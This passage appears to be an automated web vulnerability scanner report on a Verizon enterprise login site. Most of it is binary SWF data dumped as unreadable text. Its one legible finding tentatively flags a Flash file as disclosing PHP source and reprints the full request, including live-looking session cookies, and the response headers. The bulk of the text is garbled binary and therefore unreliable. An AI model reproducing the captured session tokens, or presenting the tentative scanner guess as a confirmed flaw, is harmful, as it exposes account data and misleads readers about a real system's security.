+c5._.9r.Oc3.>t.R.W......J...dy..y...]..k.cn.+.T........lM...FY..6....?W.?....T..o.u7.x.&"}....92.!I.>s. ..T..4...yd#A:..z.-}.-.#.J.M......./.?k.'j.&&1- -+...CW<7.~A[../..dF#.y..@.W..i2..$4.]..... L.D..A..1G.....g.HHl021.a.%...Xk..2._Kl.i,~t..|......J......H...R_.."..~.[....B..S    .}..Ubm.]...L.&Z-...u.j.a....e.....F{Y....Hjt.]0.U...$.W...`....n.@.%5...    .`.....+.R..j..YtJ..F...K...ea..$m....#...T..........u.............#..u($.+..m%v...    `[2....X.hks...."....mw,-..-.9.T....|U..iV...W...d..*.....F.H....v,w.tG.G..E-MU...."?._y..H......3..._>.....!.
.:}u.........s.,...\.M.tE....(/SQ.$.!..C...mm.v.....b..G....r.N.$U...A.y.....pG<.....g.p].Iu...y.......|........I.D....n_y.o..Y..Z."..'7.eF..y......&...$.../p...U...l..;..^....(~....5j....2..F...z..NU2..h .. ...92.!I.....f...f..A..v_....K1R.=...J.1..l.[.Hm..".m.h.....\..k.#i...$G.bHR.u-......    p?....; ....._S_..$FR#h............B.....X.F3.$..4....iksd..v.......O.u...i../..;@......\PJ..h....|..#.O.;........    -...6;WV....C
..&0..n.T...LK.v.S.~V...../...).=)\D~}o.....V.@..t@.qv."..$.)..K.IL.u..o.=E.q.9.55C.,fHR........f....m.....'..(......v....Z.T......h...5
   ...Yi+....SB$......2......m@e....~U.?.=...S..Ym.G...k.C......H.V"..
..6...8.. .B......J.$Uz.K@....4........g..a..(mw|..K h?.....v...T..nN........."qB...jsb..x..I.>...GT.@.).....`..9.E\.OZmt..k=..i.A.!ve.&j.t....b#.....X...=...    .9E~..#k)r......9....Lr...m.\....q..?.I..z..........R6E.m.........V..o...n<2N..#....Y...J..
HEeo........E..)."Z.^.7.`.=...u.h{..C..v..-T[..,...Z@.......1.ho|.4..HE...h..}.f......h.{j...u.0M.....O..Q..].(.wO".2.?........F.3...I....?0$......r.3..W.!...}}U.0.6.....k....7....".-=.......W>...e.|!...    .......I....Wx/U^./W.gJR....P.V.!.......a...u..u...1....~....].h..n`F....)I#8L...M........I*.wG@....|.U......{#..S.f.7..1})..u..M..%.5.7..i.?G......U...%.......7.K..#/S...Rw."my&...W...A{....u.....Ns..$.....z...@.J..g.MBNZ..d.V..K.%Y.    ....iW..T....6.b.l..p...S......<B..7...I<.9.2.....2U.....I..........5.$.LDD...0..........5.;-}.x....v........;q.p.j,P.....w..Le...v..5t4...........Kb...r..$=..H.....c....3_.O.y`.T...S.<..ACV....h.I.N...&$....|........o6..MG:.Ur.-.#..'H...g...x....Z.W.........Vz..9.D............P..)-T.!...M.A...W....r...d..{.qI........_....>...S.x.m....tp..<A..{W......Q.3.(..T.........m...;R.-!....+.#...:..;.t.
.S..[.Y..a.vm..Uv..@...}....\T9BBq.._C...Z..["....<..hz....x9.!...~....1.|.i... r].s.r.#N6.s....hP~...Z...3..S
.......DZ........P`%..J...0......s.0.....eFn..r.....6C........G(.=.'...R.20$..m.......E...4)re.S....96.
.J.S..(.A]. .Rs......O.G........F._.z.:3e...(_.P...\..F..KwC..K;p.].}......"..W.&.R.u.....\....<..iO..Y......J......?....V..e.~;.mI{....,..9..z......T.D.8...-!w,..2_..r=.L.R..y..h....HI3......c........Vh.s...j......r.+.T..>....=.x.4)...r............|.O.w........DW.oT...?.._Zp|.r'..~.l.=~.    ....v.........4.*.F.R..|....-...'?T...t.@..7...y.F.j.I....w..C.M...Km.J.)..)S.3aJR.K..rqi..y\r.......f./...j...P..@.c....=....[;.gL..../k8vb.d..%~./5.....4...sM..Tua...........I....q+..}.s.:...DY3.s.JJ..'QV..dJ.}..I,...q...~9.=#...#8M..u...Oz..1.;r...>.I.s?....F..x.GI.........|b..".Z.....s.G...F...&=....!...~...,....<..,r]...s.'..P../O>...8...=...}c...2.}J......nx......O$..
.....1EjH....lS..{G}e;.........I.k......M.Fn..DI..fK.M3...l.7..M.J.X.:&WvfJR..1"Vn.pA..w.W...e...n..Zk^I6.Vo...O..N.MU.g.g3...sx../.h.c(......V.#....zP,WvcJR...V.W|.<^..'Q.....N....=j.c.........Jj..^5....CMg..X.4.........+)gU.....`.:>M<.!..`6....pkjOd.....1t..v.....Uh..6.... .......q0.%m}....v...d...hU...s?c\R...uprh..L..#....\;...9z........a....o..U...|.=..d\Z....s.S~.#......rn_.%U]h..)..n...Q...p`#....
>..3.t.(...(......V...S!)W.....j.....8Z.)......A*.PE....n/%.Y..qk.=.....y.....`...A.]l...2...Hb......m}P..j...............;.qI..7"./..'..*.Z..`?.....z.7..=...V.p.k...~6..,X.;.J".>.r'.....G2.M@rV....p8e/ .W.E......    RU}..[7.x.z.7k..:......<.....&<|..r......^;.%...(. ._.3.qC....<...X_a.<.pk....Ts.t.O`.D.zG.W...W//.2.f.jT_Z..Y........>3.U;.s.....X/.K..r...%5\....*F.....T.:....9^.si..15..z....6.....<...u
....F.......%.m........,....<G..!..up..n..................._.    .1..9.........,....._...& .4...~xU..C....W...rx..G...ugf.......9..S....w......,..Q)...2i.9..\.d5.]|$S.m./r...H......,...v..T.._....}.E.:..z.T..7A..P..a^    (e..h.E~=..Ex#.GB.Y;.^;"4..Q.....r.-S..m.G...|GBT....E..<.(.w.T..    ^.(%.f...)..,/d.r.......>.q|.I.....f]/:.....;.qIU?....E.|........Yr.......
U.    zG......yOF...w.....=.....Z.g..{X    .cw.6.f#.z%.)]d^.L.....C...!57....y..e@*.vE.E.....O....c.. m}....hG.... ._.~ W:1%..#.......H...^..{...v...G...M.;^..n..<.z.:.......O..#..8..^.........w.Qd.#9.."..^..sr.:..#m..X}y...9...f.fY...%4.M.'
..F...C....T....10$.|...#Z.....}.........d8CE.)ntS..9..z..$.....X6A.....O.....YG.&2...&..a..,....W.6a..s.T.'.h|...;.qIU...p..G!.V7K    .<.].&...:w
i,.N.e....P....*'...(........[...9...h~...$7F".........6.H..g....tU..B[..
.......|...Q....-.....h.....kl.F..E..4,..sg1...;..I.E.w../w2%..........<...M.;.........x....V.._{..n....U..i..s...Oi1g.{.+......I*..+@../C..nC..Rdf.    .... .    u...;....>.(....j.C..jHLShy....k.B...i....p;.....e...s.uz..;.c.Nh.....-q.$.s....\..."..).x..Qa`;..Q.Q.&..>...}.I..Y.i.Tc....O...'.c..#)t..w.Ij.....W...Un_..M.C<...pq..y|<..?........3....!.V..]...p..e.e.Z...p.....o.#.@$9!N.....!...nb..z.3L..A.w....(.+..7....i..!.c$t/Sh#S.nY...b..!.)...d.#....a.r ..^imRi...y..8..i........cn..P....7...
..w..u.O.w*.....Yh.Z...\:.7.X! ...H/.]..+.AH{..3}Y.........~UU!..
...[..Qz?..*..5.6.P..%Y...*. ... .y.9..KKR.\r.!!9.gr.IU.%q..o.E.K..^...X.W.XK...J.v...T..T.ET..1$....<.5F.]$....Sn..l....>.*.....~...0......(.#. .6.Lg.l@....Ut.V.$.{.Q.-/f#Mr5<g..Sv.ywu.....s..CU.%6.A|/..GoJ.h.,......5gd9......:*"X.p....,n.M..."..
.a.K2<.(._^.I..LV..^.H..;J..z..2P..u.BF..    .....7..A..V'y.|X.j...^.
I-;......mf`K.......$...L.2b.a..(..u..i...h.`%..o.6~....Iz.7a....>KHB.B._...I.];....U.R....H<..../@..=...c...E....u.^..f.:....7......*B..+.....>.G.\r..O..D..B..\..eN..tx>..n...).^^.[...J}cds.%.2.m@....U...S..o..C 5:.7o..].......k.@    ....\B...<    ."..[......=...$.Y.|b...F........ .9F...&wTw9..qI/..y.C./.A.c]u.2S..;.....W.Q.e\...n......G)...T..J.h...u-%.s.....V]
7.*...3...r....?.m.3H.9}....c....F^.S...S....j..Z.R....u....J...ji.V....1...U.!.D....&.(..,......G..F.N...+...H.4....
D)w...$Z...V.k!.W.o. .6.j..|.u. ..X.h_ot.    .z..2ZY../+B.JW....9b.%.+...Y.B....p.zy.......0n..9)...;.V....I8.....-.>d.Ds.z.. ow.y.G...\...1.=.......q.k&J...D....`....K58Z.....o.
1.V..
f.Zc.,Mr.......A...3..P9.W...!.T..+.z}.R~.Jz.`t....n... ..
.^j.....k..p.'.....R...u.d...Uv.yk].y.j..7.qK....g..?..(.y9..........~.LIp.E...q..y._._0.....F..!ne......I.....K<P.....A...c.%z....6.$.z?..v............I...F{.._. .......L+....\....O..x..K,....`n..t^.....z...T.............V...........>...]#..e.H..T..y..~#A>9..%r...;..z..-.y..v.JF6.T......!...0..s..7d.q.N..q0..A.....:"..3...(IO..]......'U...;.b.|.&U..M~.B.N|..II...I...q.m ..7....ZL..cb....sY..S2#W......q.L+.I..=..4.s.?..G.'l.x.....51.(-...........2g......L.O....R.n..<.%..[.|    .:.......D.U6..9.bi.o.u.Sf...X.h.Q..?R;. ....)Aw.......-1Z.[.n.;.!...z...0..G..>@......12C5g...e7.....|b....(i.,z....w1p.F....2.8vI..t......v......G...Q.j..g2...O..D...+l6.%ii.o.l@..o.....l.7:.0.@.8v9...h.<.svF..........+f.wL.....{Y..r.v"J>f.-QZ.kH1...mHQ._....$|MFF/@.W.?.).&.6...%/)..E0K..z....h...%.........?..jsfwI....k.w.TH...&#Dk...9?o.V..4.>G>Wgl.u=A..h...]^...t.....
.;|.`.g.J>,.h.\.s.~l..>q0....A).......8....Lwv8b........TX...{.O...3...........\rzy>..Q.V.p..kmPr.M..\...H...n..\........c%.}i.~..Vi...=#E_R....Y`.%.,...F....(a.    ;vh.q.."6.............Q...Ce#.V$..LQ..+<....$    whA..9.|.....0...<.T.|.&Q.RE...K[."K.A;>5.....7C.n...{.hy.<3.<c..;......<.........h.sOh.Q..6q*.......o..]...3%vr.*.|
.......3b.%...yG..r)..V.L&.Va.    ..h.E..m..M....x...N.._.p.../6........h..........y.P$e...RM........Mh......%..Y.r...N86[.......3.=.2A.-.H....7.....w.(..<Pp.K.\....H..d..?.z...f.j..y.!i..^....b.g.@:&...h.r.....Q..hs.U.........FN_..Oxt.......~.r./+....N...|...[.J.o...>.Ms.Dy....A/;...C..5RQi(..K.Zv.+!n..    KR...5..v.~..&.^`\...f.&i't...\v......U.WeK....V.m.....D...."E...=...\..J.4...-........
/.K.....,.`4..G.r].#.)._......si....[&.....o..).....R?....&G..f.f.,...s.S.......1....%..K..9f....%...i{,.K[Wf.G.,H.KS...5........OV.G..-j...n.N..+5l...?....7r%.\.Kz..kP...!...?KB.rl3..^6.+I(....B.....RGZ_...P.g\...m.]..<J..s.J..t`.Si.<M^..Om.8A.....n.m{.@...0y......k.J.k}.m..1..vH......n.,C...    ..W............R+...~./\...c.\.....$.a...^J..5...[.W9...-."..S..l{.da.....m.../......}J.F....oq..b....;..Ho`....>J.k=I.$W.1%+\..V..P.?.....1.ndd5. ...H.h.....
.r..K..7M...}....*,.....|......h.P.5....Y.X..Eo.C..J.....-...)..t..........B/...t1........9.r........HY."..}..g.k'...Y..lz..~.;g..+E..|...WU.....~R.}X..2>).p.....0..{.J[jm....P.;Sq..,..\....?iCmt....F;.......f.q    ..p1...T...Lf..t......z.x.E..|.......,.H. -....h.n..@r*..t.......    ....H.cD..&A....V..m..h....B5...p.2...........-f.#..k..7.tH.e...<.....M/....;.0..p(...v.....m...y.....!<W.JW.....=3.1..o.i..!...w..mJ...{z..6...\fxI.:.~d............P.>.6...,lS.2is..P.....(. .`a.".....t..5F[=..K{!.....nx.(.3..(.%...J....SlQ.......n.L...}...!.k....<......~T_.....Td.ef..To...=...u,,......)2y...F2.+?.L3....;......Q...[f.t.)xHi7..?.....h"...d.z#.....o....>J?.HU)...C...>d.j.:.
H6...N4z...X.+.,!....W%+....]....{.H.e..l..0%.........|:....$....R....[....:...KJ.(.. Y.+..r.^...........E.C.y.h6.Y_...t.5Z..........}...../..*....s.....cd#.....?,Y...O.P.......X..Ch.Bo&,ha..O.~]....[V......s.............x.hm...#].....+    C~O../"..........H.@.S..*k.B.N.|.2.+V.%p..Q&..u...\........u....r0K..G:]'xhT.$...3.........\.y.}    ...a].s...e.c.T5J.}....<x]e.u...s6..c...c.[.._J. ...../....Mq......:.i.......w...U.j..x.......].|..h...... ....$.[....~..C...J.#.v..I.S.?..l...J.o...LX....}....V....O..J....$.ei2....t+To(.G..]^."Z.....,....t*..f..{..........3YI^e...IwCJ.{..Ph.....f;.H..~z....wqy./r.a[Xl.e.+>.#I.
.X......eu[5Tn.0..2v...0.0c[".y1.^.G.g.9..-.B...<..6....eg..U.9...n.UGn.o{......MV.....lv.&.i.2.....<f.v.<n,.....o.So.............-..e.-.B.......\+.N(s...TC.....29...9.F1...~L...v...D.....).])..e..&    `..:..].'..qV*..^..-......qH=......L4...............=R2...vy..#.{....}..S.@.....1...FG..oS.gJ.    ...P%..ED0..Y....P.l.?.......O..|qGIIB.FWkO...    m.n5U5...$w0....f&.A..a.......ry...!.....[.B.....E........o..J.0)...0..o#.8..I5P.......d....s...i..FIX...eB.'./...o/qE.c]....G.n...-...E...;.x...].;h...x....RNa\V.{f.Mg>.a.;.q.".\.......e..*Q".    ..I.....f."..K...%..|...m...S.+W3%+..Yfd....C.RI6..A....B...../.Q.YX..m./..Nv.i......g..}.6.Y......s...-..s....n.....D..H.B.....78$U.\...(`..DI.V..s...............{v.......k......0.db.......:.5Jb.H.K..t.....9.y(`.....^R.m.W.,AB.B......CY...R...4.!.....g`$.j.d1.G..........8.q...1 .-9.m.,r.Ed6),qaH...ee..U...A._...rp.u...!.._... F    v n.,n.C..0.........2.^.?..@.......o&...;......6.+....y...Z.....U...{.-3......k0..x.
.p........T.nRo....;t...lGu?..=c..>.....0.[..6.....jf3a6..?$.+..HO..w(...6.....:.Fp[...$. ....Hw    e....m.    ...c....f..K*.......!...\..n...l......_Kl=K.r[...W'M.E.Y...g]#.*.....]V....Rd.)g[...d..(..D..,.'.2=.2L.....e...I.6...n...u..I0...4..9{Ww.e......G.fHV....d.y&.'.-,n.7......?.8...v...l@4.4.....{u..Aw&.q....~.Qv...U...~..sc......B....l.....Ld.)    .XH..@z_z.f...L.P.2X....2K.Gq..    .z..g.......c..D......K.....k......K....6..M..P...*\...M!........c.x.l.....w.e.............K.y[g.0..0...5F2J...,......Y...P.2@.....M.r..;.^?    6+o...jX.W...Z...y...[q..}...{mn<r.C^d...2.8.67......w~....P..O.-(Sr9..N.\X3........~.(......O..........9f8...........$K..@z_z.i~..x.p..\R...fs9K.....d...[...z......L.|...[l.c.7.1.~.gXL.f.1.$y..aq.
......-...yp9..Jp)...$/l(.3.M.X6....-..O.......w}......5..2.Q.+.[9..9ee.NY.o_.....\):C?){....;,.........e..#......f.f.......
.x0,...3..V9.%!. ]2=.$r.MiX..}..,;V..o[.N.......mj.....{.q...D_.v...+...[.......A.....q9..N._k\...d.6..(.?.?U....}f'.{..]a.o.>.p.0...........f.....,ZN4Z.e.p3x...2nj.A*..~.(...Z.+..d\vR#Og..W..[.......@z]z.E"..}...M...|...s .....w.e?.|.2........U..@-..y.......&,`..-....v..CF.&r[...1.......km......Y.V....t.........|x
..`.M.tu..Q Lk-e1.-..n.+.-\.F.zF.Fwr.6.o..A(_.iK.@i......H......}c....O.+..:.t.....-.Mo...`n....| ......../..&.....i.'.Z......f.x.u.....IN~.Yn.W.T....md..g/.~EY?..Q6.....3^...T^G|..b`wC.........X.b..ud.Y.../(.....\4...1.P......._...| .....=n].[..._.k.....<6k$.&.....a...^...$|x....;.....(...D.-Y.U1.;9h.O.........*n.x...V.........ns...u.......#....EYucR..2P.........,.......F......F.4...D.....\...6..G.j.....q..<uHW^.i...}t3...#4Pa........r-K..H.L.O*j.MA;.Y..\vA....:..2......1.E..(.Z..../.h.gZq5~........Zq#...x.:.n....*.wo...utL.. ...3.................z..Z.&VgX.....Y...f..bK.{M.O.xzB..(......'h.~..o..aZ..F......?VA.r...e..$](.2....:0..K.kL.l$#.z...{.m.a5@Y;.-m....n._...b.w.....-(..s.{...&.O.~..........h.f...e....L........I.9..aK'T\.7J..!2...71.............C.+^..x.....U.?.....+.e.l.e.X.../8.7.`Zq..}6....h.D..........<^.......t..hy....D....2Z
..b...LhO.M\a7JRH.....W.A..Y\fn.!u,.........F.c.,..2P.i.9Y...........@......+...}I..h.
.&q..%.<.V.....-...m\m5J.WF.c4..=.7.Z.c..5.M.....!.8.|/..t......E
.sq    R.......-.....a5F.....(FcW...7..P..&...R+.?..US.S.....u,.*Iw..N.....9..oU..$....a.d.....0....p....~o...B...Q.%^1Dti.oh.j..[i.......R...#..gU.L.i#.v..;9,.._o.j...........4^<e.RSJ.\....[.....}h.....s..Q..U.2IF.c4v..._.,..m..h.Z.Q.I..eq...=l9v.K.S..:.............kU....BN.<i.+.....rbn..f..    .W.......G/.../...s....>V...,.....'.v..)h.|..Lw...5... ..d%......W..9I...`d._..e..&..a..7..!.-.....d!&.....p.vV.)..2.+.......htU\\... .Q.?<..K[X...40..W....S.2.X..Kd..=."K.<$.i..=H.....qM.(.&.....DX....U..z..i.qis....)...N2...K.O.eN.....bz......K..m]./...KL,...;/..7B.p.......`z.*...v+{.......E'S.....2F*.*.x...\Q...yK]..k....J..Eq]
.{c..\..rS...7.:.X.G._).}..C...K....O..'.".w7.(.Q#...5.d!r.!:^...;...14=.=.{..!..Vx(.x..t.a9...3.&a.....t.f.%......A.p..;...K...@.;...x.H>....Z...../.O..V.L.Oai;D\.Zv..E.......k{.........Oa$H.N...}(...R.....BpD-m.)..5.1.....U..5...\Y=..k.......|.@.O..o.%.G.,..E0.....h[.6...k8.h.J..k....d.p..O[m9=.....Y\... >~0:..
n...`....W...k....h...c.s.V\.^......L..u.6..X.W4......w..uR.......?-
w.*Z..7T.?....j...w."....BDO.x..K..V.S.....V.. @~...(..K..H..|.....D[.L.Gn..@..uLc.=...pt...."U.;..I..J..a.^..m.W=.q=<G.....; j..x.My....;p..?..%]..G.4.)...<B
zG...}..6..p.'.(j....q..(.,q..........z..G.#......|......!...>...7....`.".,..o.*
..G.M\.~......
..B.mi..@..:..%FV~.....za0......P,Q.....,m...B...q2...AyL+.Q..#....'.\.W.l......X`LQz."....!.."....rn...T\|...mB......9.BDO.jN...%N.|...Y..UT..)...2eh.....Q...p.ZE..fz;.(./...LA^.z....9U..gr    ..L...Q.........r.k9m.....B...4X...../...n..?.z8.[.....S........o..J.M.....-g.L.././...O..p.....&..5..rx.=.....?n}c.Au.MBNo..s...8DW....K.H.r:..7..U..C..}k.2..cF..?.mi....9..n=WU......z......~VD)C..c*8."..#.9..g.l.$j+..+...[._...W...i.x...>.]....%E.......#q.9......JO\W....
...oe.p.x|...../........%.|.....S.)C..E.h....u.=..Cb3.H4.{........cc4\..vU^+..]u..9....i..*.....h?.fr...p...>j.....".o.,..:......;U/.?........a.n...".-....6.U..pQ.6..?...../Cd...    6.6,*.E.y..nqq.VG....$M.B........*.....#Y3....8.mKpVC...k../.N.....L.6.a..\._..<.*..'O...W..E.2x.....@.=Zf......&.,.%..@>.wP.    yx.p..j.K@A.x...;(.H..V.m9_/k..c..V0..d..+.c.{.-.VF.dQs...Y..)...f,..S$...&E.SlT.....B    ...r3.UApiC..{,.....z...8.2...9gN.).._3Y.5..9.......uX.Y..N.,../........i.).".f+..a....*...b.....)4.4.W.
..|.......f..26Rk...i..Sa.ZH.m......^...nN..TUOc....\...I.M_..y.L.H.{.9..h9....i.L..'..........O....i.;b....S.u...=...^.-=Mu...^X.M.S..+.6..4...X.B..pAL+.-..<m..........i;...?>../o.......)..?..Q...4hkk..MD.....~./.9.3.>
...[SNIP]...

12.9. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"193cb-4e228aaf"
Vary: accept-encoding
Content-Length: 103371
Date: Mon, 05 Sep 2011 22:26:22 GMT
Connection: keep-alive

CWS
.0..x..}.|.....6{u..@y...:.....b.M...i...I..t..* KA...l.D...De...ED..q ........;..i.&~>..w.<7..{...s....&.....`E!.....;&..l..>....om2[.,.....p....[ZZ.Z..Y......O...>`@*.H%.,.}k......2("H..ds..
...[SNIP]...
<.......j...s./..=u.BZ....s..S[O}1..{..a.n........{.B..].cL.1...+nk..[.....E...?.?9...=c.n................$n(........'&.7...e.W.).....E-.P..?.........7......w..w$.K...[...G|..........s{\<?.-f.}.}..n...*.]2..g..ql^...n..~o?9G..d.....\..R.x.....t{.X..'.].>>/!r^N..............3H.4.?o..fa.......D......J....Yxy....|..u9.........g.............5.`..cw....hN....u.wg.?.v...'._....o..{&..>.E...e.~3Y.........K[.l..u..m......&%.%'.$&...c.).VV....0    6.3a..0A...2.,.p..#....^~....A....K..a.$.R..H.MI..p&p?X.1..x...M..ys.+.g.Sn.1    ......5.v.y..~:C9.v....`
l
.g-.3<p...[p.#.......!Uay.sP5.....A.#.?,98.!.0j..B......`..}::"....c.2q.@...&....X]..\..X.....^.v.....2.
......
..mv...W.. .....+.. :`y.....O..
..%.."..U......l...........c.MO..&2.E.<.Q......;...mRO=2.......\...-.y..~....K../O{cB..g.~%..K.t....v....pQ.1yI....<.j.H;w...s..    8>.....B?8r.....[.n..}..;..........|..w....U.5O...iX........y..8...Y..._XvVQ.z.k./.z....97.......*....._.;at...'.J.....O......E%.6...{]B..k..M?..N......-|u....^l..a.Ud[...e...hq.|.....5;g..._.K..`.........9....g.Ys....I.T..L..i@..X.3....;....|......I..Ks..........GO9.}!.....o.".Wn..........=.tp....6m.mxy.....'v...\..T.....Zsp.[5..wn.D....wrw)3.%.S}....:..>.......\xh....f..Y8.....!.^8./....+}f`...;.&..i....>..\8....M,.pn...y.Y.+......L.N.(.=.6.......^2/....#I.?i..rY.6.....f..=-.|......{+B3sg.....i.........(.2~G.I...x.......MK....s...S@..~.M$.......1,/=.@b.....+.)...5cs.j..!.R*...WT.YXl..W.m.....7.mM.5 ...<...A}V....ta...G.......~...<.....k...9.sy...c...<.>.<9S.ZA...._.s.>oX.........O-...6......./.)...u......kV<F$.Y)Y..9u..Q.....'.\q)i^[...oEL|l^......i.b..q.....U..0yAv.SY..x.QY.....G............?>.m.`.w..c..:....A......k.....E..{2..+..S;....XDM...a....[...>
...[SNIP]...
.h.=........>.1B...A......h.......B.....$z......G.....e%.6 ....A.oE......T......z..........(^......X.8.H^.uf.7..].    hV........y    P..................aF..uP...BO.....;..b..W....EC........N...@.X.[.-.X..40.<?.^XGth"....4....nmm.w.u.@.g............)..8......OK"...N....<.....Z.@...@.^...Q.....x..$u...    cM..._...Nu#..Ng....PD...1.M.....h..8.....Q.f`....!...a....    .....R.@.......x.V......~..A3JZ]S5..X...//.bR...nzQ~..j..Y_.N.`..i....b.....h.....i)!,.k.x.....g.s.P"...4..r....i.q...l~6.g..4..s!..hY.b....,..?u%s>B.4..L|..Z."..?rG.P...;z?......Y..3.|.qth./...';QH.*P.    ..h..^C.S..]..~b...@..<...`.H?q......O.<..........._#............5.?<..........}<..E.......Mq...[.P........>..~..ES.OS............\.?.02...wz.......UWH.Y. ..e.?...._...`...p......?..&......:d........_.....N...@'...t..0t..&m.....0I...s.:......An..<.U9....AJ.{
...c.<.8..hn.{.+/.{.\_G.../d$    1sI..\..(............I.Q.. .C..Sa...r.#5./4&.Aw..............Q....Q....V......ex......h.....qb..S|.dD.....tt...D...!..>....E....5.........F_0V..{.*5...z{..|{.....uk....]..hD    ..,.K.....BN..Mi_..VQ.h>.........V..62...Ui...F=....    (...;.c.r-..)...y..;.u.&$.0.j.........4.V...........Pra.,y....'iJ..n.ej.C...c.....5h.3......e..5.#...#...f..2.....-........"...%....A.i...hU.z.E*)..
...k....*Il&.......|..........W..vS+....f..x....
"..*D.o..N".7..;.............-i.!..c..._..6........K./%q.?A.@_..m..V.6.Z..DRl1".!.......S').[.|.....    :.{.{....XJP.......q...    .o.$y.t...\.B.....x..V7.L...;...8......p.K...^.o_.+&....q..8E    . .6S.@X...V.v...FIc<g..D..d..y.p.*w1....]...    ..l.{.c.@...t.g...q].=.d_a...e..H../
....0..A..H..yJ@...I.h.c.5.I.t.wOO.H..z...).....S......k.#Fg....]..C.'X.w.SP..u.?........R.....&^.p.N@9.N......N4........e..w..i.r......6..{.9.Iw.K.d..U..~..t.U.=..s...N7n.GR'..O2...T...7.<4(.@K.(8.:.\...>..\.C...Q.%.Cg..H.Ds.`..).<...jN.yH...1....HVA..4.}X...b....{..t.2^...^+y.E!.j....anQ...-.L$.?\t..xRr%...e...    ..c.(...........#..>.I:..$.B%c.G.....0..[.......A.x.E..+.e.    ........Dop..>.......\.=......... g.Cv.    .^..0..7.v.....#;......Mr..8.....%..^....{I.8.Vp............'....t.p....t..........W..i.6....a...P............]1.GP.Kw.#..`..z{.b@.u.A...x.....\...W.-..)+*.aW....Y8..W.H..;.u.I......KJ.!.EL.d..3.c:...q............3`.......$.7Fk.....S.F.r.X@.0..O.;..C.rS.......q.}..q*..k.xkv.70.J....<...m.[........@..GU.M...i...5V..    iD.q.].p......gH..2.].Dq..pm|Rq.H...S5n.`...g.[DBg..L..|1..Bq.~...#.{t...1...w7...D.!7...._]..|.......W.yV..xj....D.{.N..52.C\.7?.....<..L......d...8w'....B(.....OBw...(%...Lo.Q~e..y.T........pO.wT<.z*...n^\$.X_.b*I... 7w.A6.*...I.v....dH....2...,.G....
...P..........E"B........-F.f...*IN.nK...&r.9.@o....D..D.......bR.s.......
G.......)..
.jB........+...9%......Lfc..e.Ky0.w...z.&.=.|S.].I.7[An....|.Eys.F.T.Z&I...Z7=.oO..#]..;' ...`...}.Ext...s......
...K..?...#Y#.@9cv.`..k."...7...V.Q.`.*.v.........] ...>.@N.'%....#w....T...3........[N......,....M.kN.{r...y4...oP....
2.q...    lV.....K.=..m..L.y.=)qP.A$.....L....h..r}."O..).=..    ...2..G=8.........Q..g... .n.M.go.b.>..tpT....#.^..W..$e.o. 7.c..}......bL.2.`.r........|..y..S`j.k-...X....!t.......R.w.......>...+81u..P. .U..r..-..U...!.N.Df8.E...&042V;Jl"!..v....c*..#. .Z.nM...v.I.....d.o...ZX.aA...d:..B:xK.!....u....b.}...Jh..J..A....<    -...q.a.).4..i2.ypO"...6.[.v.AJhG.J..&.H.[%..\.<..x....G.!....|9.H.^..\.[....Z.+    .....<.c.u.3..........Z......2..L.s.$e.".d...~P.\-......u..!c.....W!.*.O.S..6    v.{...4    .%....    .y.3.gp... 5....o..z....J.UY    .$#&Q#.:..K.........P...j..$.O........M".Ks~Q...JQS.......A:..n    m.>..*{H.K.a...J...J...t....g.k.S...V.......o%..eH.+.2.J_..p..d.T.......yH.+.J.........Q&H5.[.Q..k.^.X.U.\..C:....`An..E..E:h.<Z.m0..Z......x.S.=Y..1.....P...m..l.    aE.T.e.9N%.c.G.5./..q5. } t{@.......%..7;......h.\[.p...Y.......E.?.....<P..K$*..V..J.\..PN-l..=D..k...X..ywRP..jJH.[.b.D..3a.:.b.........lfX..."T..5j..'..bt($.}.....^..&4.:N..g.R.m...vC:..S5rE.C:..D..*.:..2...\..vY.5.'.m    r.A.....+\ap.a.....`...B!9.d    